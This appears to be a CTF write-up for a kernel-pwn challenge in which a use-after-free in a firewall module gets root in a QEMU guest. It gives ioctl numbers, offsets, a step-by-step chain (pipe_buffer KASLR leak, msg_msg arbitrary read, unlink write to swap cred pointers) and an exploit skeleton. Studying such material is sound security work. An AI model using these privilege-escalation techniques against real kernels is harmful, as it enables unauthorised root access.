pwnfreehard

throughthewall

b01lersc

Task: exploit a Linux kernel firewall module in a QEMU guest with PTI, KASLR, SMEP, and SMAP enabled. Solution: turn a stale kmalloc-1024 rule object into a pipe_buffer KASLR leak, then use msg_msg corruption for arbitrary read and unlink-based writes to swap current->cred pointers to init_cred.

$ ls tags/ techniques/
uaf_reusepipe_buffer_ops_leakmsg_msg_arbitrary_readlist_del_unlink_writecred_pointer_swap

throughthewall — b01lersc (BCTF 2026)

Description

Goal: Exploit the firewall module!

We are given a kernel-pwn challenge with three files: bzImage, initramfs.cpio.gz, and start.sh. The guest boots with pti=on, kaslr, SMEP, SMAP, and -smp 2, and the goal is to gain root inside the VM and read /flag.txt.

Files and environment

The provided launcher is:

qemu-system-x86_64 \ -m 256M \ -nographic \ -kernel ./bzImage \ -append "console=ttyS0 loglevel=3 oops=panic panic=-1 pti=on kaslr" \ -no-reboot \ -cpu qemu64,+smep,+smap \ -smp 2 \ -initrd ./initramfs.cpio.gz \ -monitor /dev/null \ -s

Important initramfs observations:

  • /dev/firewall is world-writable.
  • /dev/ptmx exists, but devpts is not mounted, so the usual tty_struct ptmx spray path is not practical.
  • SysV message queues are available.
  • Pipes are available.
  • dmesg is readable via klogctl, which turns kernel log output into a very strong infoleak source.

Vulnerable interface

The challenge module is firewall.ko, exposing four ioctls:

#define FW_ADD_RULE 0x41004601 #define FW_DEL_RULE 0x40044602 #define FW_EDIT_RULE 0x44184603 #define FW_SHOW_RULE 0x84184604

Each firewall rule is a 0x400-byte object, so the interesting allocations live in kmalloc-1024.

The core bug is in delete: the module does kfree(rules[idx]) but does not clear rules[idx]. After that, both edit and show still operate on the stale pointer. That gives a stable use-after-free on a very sprayable cache size.

Analysis

1. Strong heap pointer leak from kernel logs

The module logs raw heap pointers with %px in fw_del_rule and fw_show_rule. Because dmesg is readable, every delete gives us the exact address of the freed firewall object.

That matters a lot: instead of guessing which allocation reclaimed the freed slot, we can free a rule, read the log, and then inspect the stale object with FW_SHOW_RULE until we recognize the replacement structure.

2. Pipe spray for KASLR bypass

The freed 0x400 firewall chunk can be reclaimed by a pipe buffer ring allocation. On this kernel, the default pipe ring contains 16 struct pipe_buffer entries, for a total size of 16 * 0x28 = 0x280, which still lands in kmalloc-1024.

After freeing a firewall rule and spraying pipes, FW_SHOW_RULE can disclose overlapping pipe_buffer entries. The useful field is:

  • pipe_buffer->ops at offset +0x10

For anonymous pipes this points to anon_pipe_buf_ops, so:

anon_pipe_buf_ops offset = 0x121ad80 kernel base = leaked_ops - 0x121ad80

In the successful run, the leak was exactly:

anon_pipe_buf_ops = 0xffffffff8221ad80 kernel base = 0xffffffff81000000

3. msg_msg corruption for arbitrary read

For the read primitive, the stale firewall object is reclaimed with a SysV msg_msg. Then the exploit corrupts:

  • msg_msg.m_ts
  • msg_msg.next

and receives the message with:

msgrcv(..., MSG_COPY | IPC_NOWAIT | MSG_NOERROR)

This makes the kernel copy extra data from an attacker-chosen kernel address. The detail that matters is that the returned buffer starts after the leading long mtype, so the leaked bytes are located at:

buf + sizeof(long) + DATALEN_MSG

with:

DATALEN_MSG = 0xfd0

4. Leaking current_task

Because the guest runs on two CPUs, the exploit first pins itself to CPU 0 for stability. Then it reads the per-CPU current_task pointer from:

CPU0_PERCPU_BASE = 0xffff88800f800000 OFF_PERCPU_CURRENT_TASK = 0x1ad00

So:

current_task = *(u64 *)(CPU0_PERCPU_BASE + OFF_PERCPU_CURRENT_TASK)

The successful run leaked:

current_task = 0xffff88800470c740

5. Data-only cred overwrite

No kernel RIP control is needed.

Once current_task and init_cred are known, the exploit reclaims another stale firewall chunk with a queued msg_msg and abuses the unlink write performed by list_del. The reclaimed object is filled so that unlink writes an arbitrary pointer value:

next = target - 8 prev = value

This yields writes to:

task->real_cred @ +0x740 task->cred @ +0x748

using:

init_cred = kernel_base + 0x1850e80

Overwriting both pointers with init_cred instantly makes the process root.

Exploit chain

  1. Open /dev/firewall and pin execution to CPU 0.
  2. Allocate and delete a firewall rule to create a stale kmalloc-1024 object.
  3. Read dmesg to recover the freed rule pointer from %px logs.
  4. Spray pipes until the stale slot overlaps a pipe_buffer ring.
  5. Leak anon_pipe_buf_ops from pipe_buffer->ops and compute the kernel base.
  6. Reclaim another stale rule with msg_msg and corrupt m_ts/next.
  7. Use msgrcv(MSG_COPY|IPC_NOWAIT|MSG_NOERROR) to build an arbitrary read primitive.
  8. Read the CPU-0 current_task pointer from per-CPU memory.
  9. Reclaim again with queued msg_msg and trigger an unlink write.
  10. Overwrite task->cred and task->real_cred with init_cred.
  11. Become root and read /flag.txt.

Key offsets and constants

FW_ADD_RULE = 0x41004601 FW_DEL_RULE = 0x40044602 FW_EDIT_RULE = 0x44184603 FW_SHOW_RULE = 0x84184604 RULE_SIZE = 0x400 DATALEN_MSG = 0xfd0 OFF_ANON_PIPE_BUF_OPS = 0x121ad80 OFF_INIT_CRED = 0x1850e80 OFF_TASK_REAL_CRED = 0x740 OFF_TASK_CRED = 0x748 OFF_PERCPU_CURRENT_TASK = 0x1ad00 CPU0_PERCPU_BASE = 0xffff88800f800000

Minimal exploit skeleton

The final solver was a tiny freestanding static binary. Its core logic is short:

kbase = setup_pipe_leak(fwfd); task = kread64(fwfd, arb_idx, arb_qid, CPU0_PERCPU_BASE + OFF_PERCPU_CURRENT_TASK); init_cred = kbase + OFF_INIT_CRED; trigger_list_write(fwfd, "task->cred", task + OFF_TASK_CRED, init_cred); trigger_list_write(fwfd, "task->real_cred", task + OFF_TASK_REAL_CRED, init_cred); read_flag();

The important part is not code execution but composing three data-only primitives:

  • stale firewall object reuse,
  • pipe-based kernel text leak,
  • msg_msg-based read and unlink-based write.

Remote staging note

The exploitation itself became stable earlier than the remote upload path.

The main blocker on the remote SSL serial service was reliably staging the exploit binary. One failed attempt appended ; echo __AFTER__ after /home/ctf/exploit, which broke observation and execution in the BusyBox ash environment. The reliable solution was to rebuild the exploit as a very small freestanding static binary (exploit_tiny.c, about 10 KB) and upload it as base64 in multiple heredoc chunks with remote_run.py.

The smaller binary avoided the flaky transfer problems that affected the larger builds, and the remote run then behaved consistently.

Result

The successful remote output showed the full chain working:

  • stale pipe slot leak,
  • anon_pipe_buf_ops leak,
  • kernel base 0xffffffff81000000,
  • current_task leak,
  • writes to task->cred and task->real_cred,
  • uid=0 euid=0,
  • and finally the flag.

$ cat /etc/motd

Liked this one?

Pro unlocks every writeup, every flag, and API access. $9/mo.

$ cat pricing.md

$ grep --similar

Similar writeups